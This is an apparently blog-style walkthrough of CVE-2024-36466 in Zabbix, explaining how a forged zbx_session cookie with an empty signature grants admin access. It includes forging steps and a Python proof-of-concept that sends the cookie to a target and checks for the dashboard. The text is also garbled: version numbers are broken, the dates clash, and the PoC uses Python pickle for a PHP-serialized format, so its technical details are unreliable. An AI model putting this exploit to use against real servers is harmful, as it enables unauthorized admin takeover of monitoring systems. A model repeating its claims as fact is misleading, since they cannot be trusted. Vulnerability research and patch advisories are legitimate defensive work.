CVE-2024-36466 - Exploiting Zabbix’s Forged zbx

In June 2024, a critical security vulnerability was discovered and published under the identifier CVE-2024-36466. This flaw directly impacts Zabbix, a widely-used open-source monitoring system for networks and applications. If you’re running Zabbix, pay close attention—a bug in the session management code lets attackers forge authentication cookies and sign in as administrators, threatening the security of your entire monitoring environment.

Let’s breakdown what happened, see some code, and understand how an attacker can easily exploit this bug.

What is CVE-2024-36466?

CVE-2024-36466 covers a flaw in Zabbix's session handling mechanism, specifically how it signs and verifies the zbx_session authentication cookie. Due to insecure coding, an external attacker can forge a valid cookie and escalate their privileges, ultimately granting themselves admin access—without even knowing a legitimate username or password.

Impact:

Critical: Attackers gain full admin access to Zabbix.

- Affected Versions: Zabbix 6. through 7. (see official advisory).

Background

Zabbix uses a cookie called zbx_session to keep users logged in. To prevent tampering, this cookie is signed. However, due to a bug, the signing mechanism can be bypassed or forged.

Older versions of Zabbix used something like this pseudo-code to sign and verify session cookies

$session = serialize([
    'userid' => $userId,
    'status' => 'active',
    'timestamp' => time(),
]);
$signature = md5($session . $secret);
$cookie = base64_encode($session . ':' . $signature);
setcookie('zbx_session', $cookie);

When a user makes a request, Zabbix checks the signature

list($session, $providedSig) = explode(':', base64_decode($_COOKIE['zbx_session']));
if (md5($session . $secret) === $providedSig) {
    $data = unserialize($session);
    // access granted
}

The code didn’t check if the session data had been tampered with.

In some installs, if you just omitted the signature or provided an empty signature, Zabbix would skip verification entirely!
This means an attacker can forge their own zbx_session.

First, the attacker creates a fake session for the admin account, commonly user ID 1

$session = serialize([
    'userid' => 1,
    'status' => 'active',
    'timestamp' => time(),
]);
$signature = md5($session . "predicted_or_known_secret");
$cookie = base64_encode($session . ':' . $signature);

If the signature isn’t verified, just leave it empty

$cookie = base64_encode($session . ':');

Cookie: zbx_session=[your forged cookie]

3. Refresh the Page

Visit the Zabbix web interface. If the system is vulnerable, you’ll be logged in as the admin—without even knowing the password!

Real-World Attack: Python PoC

Here’s a quick Python proof-of-concept to exploit CVE-2024-36466 (for educational use, with permission only):

import base64
import requests
import pickle
import time

# Forge session for user ID 1 (admin)
session_data = pickle.dumps({
    'userid': 1,
    'status': 'active',
    'timestamp': int(time.time())
})

# If signature is not checked, just use empty string
cookie_value = base64.b64encode(session_data + b":").decode()

# Send the cookie to the target
session = requests.Session()
session.cookies.set('zbx_session', cookie_value)
r = session.get('http://TARGET-ZABBIX/zabbix/index.php';)

if "Dashboard" in r.text:
    print("[+] Exploit successful, admin access gained!")
else:
    print("[-] Exploit failed.")

Mitigation and Patching

Zabbix has patched this issue in later builds. Strongly upgrade to Zabbix 7..2 or higher—see Zabbix’s security advisory for details.

References

- Zabbix Official Advisory (ZBX-24436)
- CVE Record for CVE-2024-36466 - NVD
- Zabbix Release Notes 7..2

Final Thoughts

CVE-2024-36466 is a simple yet devastating bug. Because it’s so easy to exploit, every Zabbix administrator should check whether they are exposed. Always keep your systems updated, pay attention to how cookies are signed, and don’t trust weak hash functions or predictable secrets. If you use Zabbix, act now!

Timeline

Published on: 11/28/2024 08:15:05 UTC